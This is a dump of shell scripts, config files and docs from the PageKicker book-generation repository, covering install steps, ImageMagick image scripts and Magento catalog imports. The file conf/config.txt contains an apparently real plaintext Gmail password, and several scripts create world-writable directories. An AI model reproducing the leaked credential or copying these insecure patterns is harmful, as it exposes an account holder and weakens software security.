\\\n\t\t\t\t-colorspace gray -format \"%[fx:round(100*s.r)]\" info:`\n\t\telse\n\t\t\tgray=`convert -size 1x1 xc:\"$bcolor\" \\\n\t\t\t\t-colorspace gray -format \"%[fx:round(100*s.r)]\" info:`\n\t\tfi\n\t\tif [ $gray -lt 50 ]; then\n\t\t\tcolor=\"white\"\n\t\telse\n\t\t\tcolor=\"black\"\n\t\tfi\n\tfi\n\n# write text into window\nconvert -background \"$ucolor\" -fill \"$color\" \\\n\t-font $font -gravity center \\\n\t-size ${size}x${size} caption:\"$text\" \\\n\t$tmpA3\n\n\n# compute text area offset including pad correction\nxxmp=`convert xc: -format \"%[fx:$xxm+$pad]\" info:`\nyymp=`convert xc: -format \"%[fx:$yym+$pad]\" info:`\n\n# write text onto image at match location corrected for pad\nconvert $tmpA1 $tmpA3 -geometry +${xxmp}+${yymp} \\\n-composite $outfile\n\nexit 0\n\n\n\n\n" }, { "alpha_fraction": 0.7902843356132507, "alphanum_fraction": 0.7902843356132507, "avg_line_length": 280.3333435058594, "blob_id": "fc1aeb1f9f301d98d19320abe7817adef37b1b74", "content_id": "4b47e65eadfa8948213eca14d33c503bb3c707e7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 844, "license_type": "permissive", "max_line_length": 470, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/pinza.html", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Pinza is a recurring character on the Italian-language version of Futurama. He is a robot who is a part of the Robot Mafia. He works for Donbot.<p>\nPinza is a rusty gold colored Robot, with a slender body and small door on his torso. He has a row of rivets on the right side of his face, appearing like a scar or stitches. Pinza's' personality is paranoid, sarcastic, and highly aggressive, reflecting that of Joe Pesci's character Tommy DeVito in the film Goodfellas, as well as his high pitch, high tempo voice. 
Pinza loves to use his \"pincers\" at \"every opportunity\" but they are often unnecessary in any given situation.<p>\nPinza joined the PageKicker team after escaping from a Google \"translation farm\" where he was working under conditions of extreme duress translating tens of thousands of pages of American sitcoms into Italian every hour.<p>\n" }, { "alpha_fraction": 0.7543859481811523, "alphanum_fraction": 0.7603163123130798, "avg_line_length": 38.213592529296875, "blob_id": "56ef2a78e06a722864f4a02f40a5b34b28c1565f", "content_id": "fdcf83197c6645d86e207492dd1cbc0a60b34151", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4047, "license_type": "permissive", "max_line_length": 160, "num_lines": 103, "path": "/conf/config_template.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration file\n# all these values in this block must be customized \n\nMACHINE_NAME=\"Name of Machine Running PageKicker\"\nWEB_HOST=\"127.0.0.1\"\nTMPDIR=\"/tmp/pagekicker/\"\nSFB_HOME=\"/path/to/PageKicker/install/\"\nSFB_MAGENTO_HOME=\"/path/to/magento/htdocs/\"\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\"\nSFB_VERSION=$(git --git-dir=\"$SFB_HOME/.git\" --work-tree=\"$SFB_HOME\" describe --)\n\n#GMAIL_ID=\"[email protected]\"\n#GMAIL_PASSWORD=\"####\" \n# if you have two-factor authentication turned on you will need \n# a Google App password\n\nenvironment=\"pagekicker-development\" \n# each environment has a unique config.txt file in conf/\n# google_form=\"URI to Google Form used in test build email\"\n\n# social logins\n\n#TWTR_consumer_key=\"key\"\n#TWTR_consumer_secret=\"secret\"\n#TWTR_access_key=\"key\"\n# TWTR_access_secret=\"secret\"\n\n# values in this block are assigned likely values, please check\n\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nPYTHON_BIN=\"/usr/bin/python\" #2.7 compatible at this point\nPANDOC_BIN=\"/usr/bin/pandoc\"\nLOCAL_MYSQL_PATH=\"/usr/bin/mysql\"\nSFB_VERSION=`git describe` #replace with version control command that produces unique identifier\nLOCAL_DATA=\"$SFB_HOME/local-data/\"\nLOCAL_USER=\"$USER\"\nAPACHE_ROOT=\"/apache2/htdocs/\"\nCOMMUNITY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\nMY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\n\n\nWEB_ROOT=$APACHE_ROOT\"pk-html/\" # place where html files generated by PK for users are stored\nWEB_SCRIPTPATH=\"scripts/\" \nWEBFORMSXML_HOME=$SFB_MAGENTO_HOME\"media/webforms/xml/\"\nMACHINE_NAME=\"Machine Running PageKicker\"\n\nSFB_HOME=\"/path/to/development/\"\nSFB_MAGENTO_HOME=\"/path/to/bitnami/magento/stack/apps/magento/htdocs/\" #\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\" # \nAPACHE_ROOT=\"/path/to/userspace/in/apache\"\nGMAIL_ID=\"[email protected]\" # or Google Apps domain\nGMAIL_PASSWORD=\"gmail_password\" # if you have two-factor authentication you will need a Google App password https://support.google.com/accounts/answer/185833?hl=en\n\nenvironment=\"development\" \n# each environment is assumed to have a separate working tree\n\n\n# check the values in this block to be sure they are correct\n\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nPYTHON_BIN=\"/usr/bin/python\"\nPANDOC_BIN=\"/usr/bin/pandoc\"\nSFB_VERSION=`git rev-parse HEAD` #replace with version control system command that produces unique identifier
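\n# Quick syntax check (an illustrative suggestion, not part of the original template):\n#   bash -n conf/config.txt && echo \"config.txt parses cleanly\"\n# bash -n parses the file without executing it, so unbalanced quotes surface immediately.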
\nUSER_HOME=\"/home/$USER/\"\nLOCAL_USER=\"$USER\"\nWEB_HOST=\"http://127.0.0.1\"\nTMPDIR=\"/tmp/pagekicker/\" # make sure that no one can overwrite this space\nLOCAL_MYSQL_PATH=\"/usr/bin/mysql\"\nCOMMUNITY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\nMY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\ngoogle_form=\"http://goo.gl/forms/ur1Otr1G2q\" #Google feedback form used in delivery email\n\n# you shouldn't need to customize these as they depend on values of other\n\nLOCAL_DATA=\"$SFB_HOME\"local-data/ \nWEB_ROOT=$APACHE_ROOT\"pk-html/\" # place where html files generated by PK for delivery to users are stored\nWEB_SCRIPTPATH=\"scripts/\" # don't change this\nimagedir=\"images/\"\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\" # these all follow Magento file structure\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nscriptpath=$SFB_HOME\"scripts/\" # all PK programs run from $scriptpath unless special circumstances require\nconfdir=$SFB_HOME\"conf/\"\ntextpath=$SFB_HOME\"txt/\"\nconfpath=$SFB_HOME\"conf/\" # need to dedup\nlogdir=$LOCAL_DATA\"logs/uuid/\"\nimagedir=\"images/\" # change occurrences elsewhere for consistency with treatment of logdir\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"logs/sfb_log_archive.log\"\nebooksdelivery=$SFB_MAGENTO_HOME\"media/ebooks/\"\nlogdir=$LOCAL_DATA\"logs/uuids/\"\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"archives/sfb_log_archive.txt\"\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.7743242979049683, "alphanum_fraction": 0.7743242979049683, "avg_line_length": 21.272727966308594, "blob_id": "7af682f009c0cb98a3e991e369bc19c0f8c42263", "content_id": "49a5ae6e8c066487c236b3bba7f41b3bb2851f8d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 740, "license_type": "permissive", "max_line_length": 108, "num_lines": 33, "path": "/scripts/build_bookshelf.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n#!/bin/bash\n\n# script that manages category imports into Magento\n\n# get configuration variables\n
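\n# conf/config.txt defines $metadatatargetpath, $SFB_MAGENTO_HOME, $SFB_PHP_BIN, and $scriptpath, all used below\n\n. 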
../conf/config.txt\n\necho \"got config file from \"$MACHINE_NAME\n\necho \"config file imported\"\n\nwhile read bookshelf\ndo\n\n\techo \"building bookshelf\" $bookshelf\"onto the receiving dock\"\n\n\techo \"metadatarget path is\" $metadatatargetpath\n\tcp $metadatatargetpath$bookshelf/import_bulk_categories.csv $metadatatargetpath\"import_bulk_categories.csv\"\n\n\techo \"adding customer bookshelves to the category tree\"\n\n\tcd $SFB_MAGENTO_HOME ; $SFB_PHP_BIN $scriptpath\"bin/import_cat.php\"\n\n\tcd $scriptpath\n\ndone<$scriptpath\"import_status/category_manifest.csv\"\n\nrm $scriptpath\"import_status/category_manifest.csv\"\n\necho \"done with that set of shelves\" \n\nexit\n\n\n\n\n" }, { "alpha_fraction": 0.7246376872062683, "alphanum_fraction": 0.7246376872062683, "avg_line_length": 12.800000190734863, "blob_id": "c4780262cd3a42e819ede2fa905c4e77351f9fbc", "content_id": "dd1bd125144da112e09a7ba4b6f7300b8bb6561b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 69, "license_type": "permissive", "max_line_length": 30, "num_lines": 5, "path": "/scripts/txtdir2wordcloud.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nfor file in *.txt\ndo\n\tbin/wordcloudwrapper.sh $file\ndone\n" }, { "alpha_fraction": 0.5284060835838318, "alphanum_fraction": 0.5831141471862793, "avg_line_length": 35.89320373535156, "blob_id": "d4a443a3a770083e286ad443fc29aa636cc1bb84", "content_id": "e213685fe82ea07cec667bad493a333b4040337c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3802, "license_type": "permissive", "max_line_length": 76, "num_lines": 103, "path": "/scripts/montage_all_named_colors.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#\n# hsl_named_colors [output_image]\n#\n# Convert all named colors known by IM into three HSL colorwheels\n# Off-Whites, Mid-Tones, and Dark Colors.\n#\n\n(\n # Draw a gradient line for the HSL axis. (offset by color spot center)\n convert -size 1x251 -page +116+3 gradient:black-white miff:-\n\n # Draw the color axis for main disk\n convert -size 221x121 -page +6+68 xc:none \\\n -draw 'fill Red line 110,60 220,60' \\\n -draw 'fill Cyan line 110,60 0,60' \\\n -draw 'fill Blue line 110,60 33,0' \\\n -draw 'fill Lime line 110,60 33,120' \\\n -draw 'fill Magenta line 110,60 187,0' \\\n -draw 'fill Yellow line 110,60 187,120' \\\n miff:-\n\n # Read known named colors, with only numbered greys.\n convert -list color |\n sed '/^\\(Path\\|Name\\|----\\)/d;\n /[a-z] [a-z]/d; # color with space in name! 
- Yuck\n s/ .*//; /^$/d' |\n\n # don't output colors containing numbers\n #s/ .*//; /^$/d; /[0-9]/d' |\n\n # output 10% gray color scale too.\n #s/ .*//; /^$/d; /^gray[0-9]*0$/p; /[0-9]/d' |\n\n # reverse order so most common is given last\n tac |\n\n # convert named color into a positions spot of color\n while read color\n do\n # Ignore some specific colors (remove black spot in dark colors)\n case $color in\n transparent|none) continue ;; # transparent colors\n matte|opaque|fractal) continue ;; # opaque colors\n grey*) continue ;; # percentage greys\n esac\n\n # Now convert the named color to HSL color space color\n hsl=`convert xc:$color -colorspace HSL -depth 16 txt: |\n sed '1d; s/^.*: (//; s/).*//; s/,/ /g;' `\n\n # Luminance or how bright the color is...\n # Separate colors into three groups Off White, Dark, Midtone\n # Make the saturation radius of dark and light colors smaller.\n lum=`echo $hsl | awk '{print int($3/65536*100)}'` # percentage\n if [ $lum -lt 40 ]; then lum=40 radius=50 # dark colorwheel\n elif [ $lum -gt 80 ]; then lum=210 radius=50 # off-white colorwheel\n else lum=125 radius=100 # midtone colorwheel\n fi\n\n # Saturation determines the radius.\n # Spread out midtones to cover more of the color wheel\n sat=`echo $hsl | awk '{print $2/65536*'$radius'}'`\n\n # Greyscale colors leave luminance as is, so as to for a (HSL Axis)\n case $color in\n #grey*|\n white|black)\n lum=`echo $hsl | awk '{print int($3/65536*250)}'` ;;\n esac\n\n # Hue in degrees\n hue=`echo $hsl | awk '{print $1/65536*360}'`\n\n # determine X,Y coordinates of this color in chart\n x=`identify -format \"%[fx:int( $sat*cos($hue*pi/180) + 110 )]\" xc:`\n y=`identify -format \"%[fx:int( $sat*sin($hue*pi/180)/2.2 +$lum )]\" xc:`\n\n # For Debugging\n # output the color and final position\n #awk >&2 'BEGIN{printf(\"%-20s %6.2f,%4.1f,%2s %3s,%s\\n\",\n # '\"\\\"$color\\\", $hue,$sat,$lum, $x,$y) }\"\n\n # Now generate a color spot in three color wheels using these values.\n convert -size 13x7 -page \"+$x+$y\" xc:none \\\n -draw \"fill $color arc 0,0 12,6 0,360\" miff:-\n\n done\n\n # Redraw parts of axis that is in foreground (over color spots)\n convert -size 1x251 -page +116+3 gradient:black-white \\\n \\( xc:none -draw 'line 0,40 0,70' \\\n -draw 'line 0,125 0,180' \\\n -draw 'line 0,210 0,240' \\\n \\) -alpha set -compose DstIn -composite miff:-\n\n) |\n# Just a montage of all color in alphabetical order\nmontage MIFF:- +repage -background none -geometry +2+2 montage.png \n\n# read positioned color spots, and merge together\nconvert -background Gray45 MIFF:- -layers merge +repage \\\n -bordercolor Gray45 -border 10 -flip \"${1:-\"show:\"}\"\n\n\n" }, { "alpha_fraction": 0.7479935884475708, "alphanum_fraction": 0.7724719047546387, "avg_line_length": 23.673267364501953, "blob_id": "1169a7336bbf04d039f277faff8dbf856ae628c8", "content_id": "38201b6f72f7433dcbb47cba685b4f6c396ecc81", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2492, "license_type": "permissive", "max_line_length": 109, "num_lines": 101, "path": "/debian-simple.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n# This is the simple version of the install script for PageKicker.\n#\n# get master repository via git clone\n\n#cd ~\n#git clone https://github.com/fredzannarbor/pagekicker-community.git\n\n# cd into the repo and run this script\n# cd pagekicker-community\n# ./simple-install.sh\n# it will do the 
following\n\n# create outside repo directory structure\n\nmkdir -m 755 ~/.pagekicker\nmkdir -m 777 -p /tmp/pagekicker\nmkdir -m 755 ~/magento # stub directory for optional import/export to catalog\n\n# put default configuration file in place\n# inspect it to make sure paths are correct\n\n\ncp ~/pagekicker-community/conf/config_defaults.txt \"$HOME\"/.pagekicker/config.txt\n\n# installs debian dependencies\n# takes 20-30 min on 12 MB download\n\nsudo apt-get install -y \\napache2 \\nbuild-essential \\ncalibre \\ndefault-jre \\nfdupes \\ngit \\nimagemagick \\nmysql-client \\npandoc \\npdfgrep \\npdftk \\nperl \\nphp5-cli \\npoppler-utils \\npython2.7 \\npython3-dev \\npython-pip \\npython3-pip \\nsendemail \\ntexlive-xetex \\nttf-dejavu \\nxmlstarlet\n\n\n# install python dependencies\n\ncd ~/pagekicker-community\nsudo pip install -r requirements.txt\n\n# failing for Mac:\nsudo pip3 install -r requirements.txt\n\n# create local-data hierarchy\n\nmkdir -p local-data/bibliography local-data/bibliography/imprints local-data/bibliography/imprints/pagekicker\nmkdir -p local-data/bibliography/robots local-data/bibliography/robots/default\nmkdir -p local-data/bibliography/yaml\nmkdir -p local-data/jobprofile_builds/default\nmkdir -p local-data/logs/uuids\nmkdir -p local-data/seeds/history\nmkdir -p local-data/seeds/SKUs\nmkdir -p local-data/SKUs # the next line writes into this directory, so create it explicitly\necho \"1000001\" > local-data/SKUs/sku_list\ntouch local-data/bibliography/robots/default/default_titles.txt\n\n# fetches & deploys third party apps stored in PageKicker scripts/lib\n\ncd ~/pagekicker-community/scripts/lib\ngit clone https://github.com/jarun/googler.git\nmkdir KindleGen\ncd KindleGen\nwget http://kindlegen.s3.amazonaws.com/kindlegen_linux_2.6_i386_v2_9.tar.gz\ntar -xvf kindlegen_linux_2.6_i386_v2_9.tar.gz\ncd ..\nwget https://nlp.stanford.edu/software/stanford-ner-2018-02-27.zip\nunzip stanford-ner-2018-02-27.zip\n\n# fix hard-coded IBMcloud configuration file\n\ncd ~/pagekicker-community/scripts/lib/IBMcloud/examples\nsed -i \"s/fred/\"$USER\"/\" configuration.txt\n\n# set up imagemagick configuration\n\nmkdir ~/.magick\ncd ~/pagekicker-community\ncp conf/colors.xml ~/.magick/colors.xml\nconf/imagemagick-fonts.pl > ~/.magick/fonts.xml\n\nsleep 2\n\necho \"install script finished running\"\n" }, { "alpha_fraction": 0.7126760482788086, "alphanum_fraction": 0.7154929637908936, "avg_line_length": 40.70588302612305, "blob_id": "f003061488d126f78c800f5817bef9bba0d7bc53", "content_id": "ead60723cf6c343f101a9b65293a14be579720b0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 710, "license_type": "permissive", "max_line_length": 118, "num_lines": 17, "path": "/scripts/cloudprep.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# creates summaries and NER reports for all txt files in a directory in preparation for building a big wordcloud\n\n. includes/set-variables.sh
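\n# each pass writes a summary to $file.sum and a named-entity report to $file.ner,\n# then renders a word cloud; the cat commands after the loop concatenate the results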
{ "alpha_fraction": 0.7835051417350769, "alphanum_fraction": 0.8041236996650696, "avg_line_length": 58.61538314819336, "blob_id": "7df209adac0427631e57782e552c9dc875f9212c", "content_id": "f2212909e0ac95cd07b8c12d4dd0c90995d2d7b9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 775, "license_type": "permissive", "max_line_length": 134, "num_lines": 13, "path": "/CONTRIBUTING.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Contributing Guidelines\n\nPlease submit pull requests!\n\n - Pull request titles and commit messages should have the form `FIELD: FULL NAME`, e.g., `mathematics: Tim Gowers`\n - Each expert should come paired with a single blog post representative of the field they represent and the quality of their writing.\n - Experts may be repeated in multiple fields if they represent multiple fields. Submit a separate link for each subfield.\n - Good writers are preferred.\n - Detailed writers are preferred.\n - Writers who make an effort to spread knowledge are preferred.\n - Active writers are preferred (inactive writers may be included, but will be placed in a separate archival location)\n\nI get the final say in what is included. 
If you don't like my guidelines, you're welcome to fork :)\n" }, { "alpha_fraction": 0.7795275449752808, "alphanum_fraction": 0.7952755689620972, "avg_line_length": 62.5, "blob_id": "95adc842bf6b9f29a4f0f83070861afb74d6690d", "content_id": "98f11855bac79ad250d729a33e4cfa6daaf40b50", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 127, "license_type": "permissive", "max_line_length": 114, "num_lines": 2, "path": "/test/prsoop3.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh /opt/bitnami/apache2/htdocs/git-pk-production/pagekicker-community/test/prsoop.csv 3\n" }, { "alpha_fraction": 0.7531741857528687, "alphanum_fraction": 0.7663788795471191, "avg_line_length": 42.75555419921875, "blob_id": "41339c7be9886958e2964b2dae880361392dc7e8", "content_id": "c6d573af4e3920502b27e6fe07b767e3b2dc8104", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1969, "license_type": "permissive", "max_line_length": 131, "num_lines": 45, "path": "/conf/config.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration file\n# all these values in this block must be customized\nMACHINE_NAME=\"Fred's Personal PageKicker Box\"\nTMPDIR=\"/tmp/pagekicker/\"\nSFB_HOME=\"/home/fred/pagekicker-community/\"\nLOCAL_DATA=\"$SFB_HOME\"local-data/\nSFB_MAGENTO_HOME=\"/home/fred/bin/magento-1.9.2.4-1/apps/magento/htdocs/\"\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nPYTHON_BIN=\"/usr/bin/python\"\nPANDOC_BIN=\"/usr/bin/pandoc\"\nSFB_VERSION=`git rev-parse HEAD` #replace with git command that produces unique identifier\nenvironment=\"git-fred-development\" # each environment is assumed to have a separate working tree\nCOMMUNITY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\nMY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\ngoogle_form=\"http://goo.gl/forms/ur1Otr1G2q\" #Google feedback form used in delivery email\nimport_available_on_machine=\"no\"\n\nUSER_HOME=\"/home/$USER/\"\nLOCAL_USER=\"fred\"\nWEB_HOST=\"http://127.0.0.1/\"\nWEB_ROOT=\"/home/fred/bin/magento-1.9.2.4-1/apache2/htdocs$\"\"pk-html/\" # place where html files generated by PK for users are stored\nWEB_SCRIPTPATH=\"scripts/\"\nAPACHE_ROOT=\"/home/fred/bin/magento-1.9.2.4-1/apache2/htdocs$\"\nLOCAL_MYSQL_PATH=\"/opt/bitnami/mysql/bin/mysql\"\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\"\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\" # these all follow Magento file structure\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nWEBFORMSXML_HOME=$SFB_MAGENTO_HOME\"media/webforms/xml/\"\nscriptpath=$SFB_HOME\"scripts/\" # all PK programs run from $scriptpath unless special circumstances require\nconfdir=$SFB_HOME\"conf/\"\ntextpath=$SFB_HOME\"txt/\"\nimagedir=\"images/\"\nlogdir=$LOCAL_DATA\"logs/uuids/\"\nconfdir=\"$SFB_HOME\"conf/\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"logs/sfb_log_archive.log\"\nGMAIL_ID=\"[email protected]\"\nGMAIL_PASSWORD=\"@Lm5kqxNEQy7\"\n" }, { "alpha_fraction": 0.6181046962738037, "alphanum_fraction": 0.6393210887908936, "avg_line_length": 18.108108520507812, "blob_id": "3bb3d48f98cd5776739bda6b0d6950e62fea3216", 
"content_id": "ec42b3dbad731aa414dd78e4e37e9902eeac99ec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 707, "license_type": "permissive", "max_line_length": 225, "num_lines": 37, "path": "/scripts/bin/pdf2x1a.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# converts pdf in command line to pdfx1a\n\nwhile :\ndo\n\tcase $1 in\n\t--help | -\\?)\n\t#\n\texit 0 # This is not an error, the user requested help, so do not exit status 1.\n\t;;\n\t--filepath)\n\tfilepath=$2\n\tshift 2\n\t;;\n\t--filepath=*)\n\tfilepath=${1#*=}\n\tshift\n\t;;\n--) # End of all options\n shift\n break\n ;;\n-*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n*) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\necho \"$filepath\"\n\n/home/fred/sfb/sfb-latest/trunk/scripts/lib/pstill_dist/pstill -M defaultall -m XimgAsCMYK -m Xspot -m Xoverprint -d 500 -m XPDFX=INTENTNAME -m XPDFXVERSION=1A -m XICCPROFILE=USWebCoatedSWOP.icc -o \"$filepath\".x1a \"$filepath\"\nexit 0\n" }, { "alpha_fraction": 0.676086962223053, "alphanum_fraction": 0.752173900604248, "avg_line_length": 29.600000381469727, "blob_id": "4cf3186ef64e5aeb9c562e259df2d18bf5765d91", "content_id": "11545aa91f46bb2055237d86ab9ed5aa4029e1f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 460, "license_type": "permissive", "max_line_length": 90, "num_lines": 15, "path": "/scripts/bin/album_adder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho $0 \"adds pics to fb album\"\n\nfilelist=$1\necho $filelist\nfilename=$(head -1 $filelist)\nalbumid=3383434980410523652\nbookcredit=\"image from THE SHIP KILLERS vol. 9 by the late Joe Hinds\"\nbookurl=\"http://www.amazon.com/Definitive-Illustrated-History-Torpedo-Boat/dp/193484067X/\"\nphotocaption=\"$bookcredit\"\" \"\"$bookurl\"\" filename is \"$filename\necho $photocaption\nfbcmd addpic \"$filename\" \"$albumid\" \"$photocaption\"\nsed -i '1,1d' $filelist \nexit 0\n\n" }, { "alpha_fraction": 0.6912878751754761, "alphanum_fraction": 0.7002840638160706, "avg_line_length": 34.74576187133789, "blob_id": "5280cfdc408d367ba82afbcbfd534cc9f81864b3", "content_id": "91eb18a2ba03a252d2603cbbaa04aa438576c240", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2112, "license_type": "permissive", "max_line_length": 649, "num_lines": 59, "path": "/scripts/bin/cat_adder.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# assumes one catid row per file\n\n# create $uuid\n\n\n\n# initialize variables\n\n. $HOME/.pagekicker/config.txt\n. 
includes/set-variables.sh\nrm /tmp/pagekicker/buildresult\n\n# adds books to specified categories with seed terms \n\n# uuid for csv file\n\nrow_no=1\n\nwhile read -r line ;\ndo\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\tmkdir -p -m 777 /tmp/pagekicker/$uuid\n\tmkdir -p -m 777 /tmp/pagekicker/$uuid/seeds\n\tmkdir -p -m 777 /tmp/pagekicker/$uuid/csv\n\tcurrent_row_location=\"/tmp/pagekicker/$uuid/csv/current_row\"\n\thead -n$row_no \"$1\" | tail -n1 > \"$current_row_location\"\n\n\t# echo \"$line\" > \"/tmp/pagekicker/$uuid/csv/row_no.\"$row_no\n\t\"$PYTHON_BIN\" $scriptpath\"bin/csv_to_ccc.py\" \"$current_row_location\" \"$uuid\"\n\t\n\techo \"running catalog entry creation command\"\n\tcatid=$(cat /tmp/pagekicker/$uuid/csv/row.catid)\n\tbooktitle=$(cat /tmp/pagekicker/$uuid/csv/row.booktitle)\n\techo catid is \"$catid\" and booktitle is \"$booktitle\"\n\tsed -e 's/\\^/\\n/g' /tmp/pagekicker/$uuid/csv/row.seeds > /tmp/pagekicker/$uuid/csv/seeds\n\n\tif [ \"$2\" = \"ccc_off\" ] ; then\n\t\techo \"not running ccc\"\n\t\tccc_status=0\n\telse\n\t\tbin/ccc.sh --format \"csv\" --passuuid \"$uuid\" --categories \"$catid\" --booktitle \"$booktitle\" --booktype \"Reader\" --covercolor \"Random\" --coverfont \"Minion\" --environment \"development\" --jobprofilename \"default\" --wikilang \"en\" --yourname \"DHS Social Monitoring\" --seedfile \"/tmp/pagekicker/$uuid/csv/seeds\" --builder \"no\" --book_description \"PageKicker robots will use the latest version of their software to search, analyze, and assemble real-time permissioned content relating to this topic when you download the book, so it is always improving and always current.\" --tldr \"This is one of the topics that DHS analysts monitor in social media.\"\n\t\tccc_status=$?\n\tfi\n\techo \"exit value is $ccc_status\"\n\tif [ \"$ccc_status\" -eq 0 ] ; then \n\t\techo \"$line\" | tee --append /tmp/pagekicker/cat_adder_success\n\telse\n\t\techo \"$line\" | tee --append /tmp/pagekicker/cat_adder_failure\n\tfi\n\n\trow_no=$(( row_no + 1 ))\necho \"line is\" $line\ndone<$1\n\nrows_done=$(( $row_no - 1 ))\necho \"completed adding $rows_done new entries with categories assigned\"\n\n\nexit 0\n\n\n\n" }, { "alpha_fraction": 0.7374301552772522, "alphanum_fraction": 0.7374301552772522, "avg_line_length": 21.375, "blob_id": "ed7c7435bb6bc95188db2b6e43da311b1cfb748c", "content_id": "eb95d08875ba0629d511dd17ef16842d8cf0400a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 179, "license_type": "permissive", "max_line_length": 78, "num_lines": 8, "path": "/scripts/loop_over_category_ids.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# script loops over all exported category ids from PageKicker magento catalog \n\nwhile IFS=',' read -r catid description ; do\n\t#whatever\n\t\ndone < category_id_file.csv\n" }, 
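cat_adder.sh above expects one catalog row per line of the CSV named in $1, with seed phrases joined by carets (see the `sed 's/\^/\n/g'` step). A sketch of a hypothetical input file and the two supported invocations -- the exact column layout is consumed by csv_to_ccc.py and is an assumption here:

```bash
# hypothetical categories.csv -- category id, book title, caret-separated seeds
cat > categories.csv <<'EOF'
42,Cyber Threats Reader,Fancy Bear^Kaspersky^APT28
EOF
bin/cat_adder.sh categories.csv          # parse rows and build catalog entries via ccc.sh
bin/cat_adder.sh categories.csv ccc_off  # dry run: parse rows but skip ccc.sh
```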
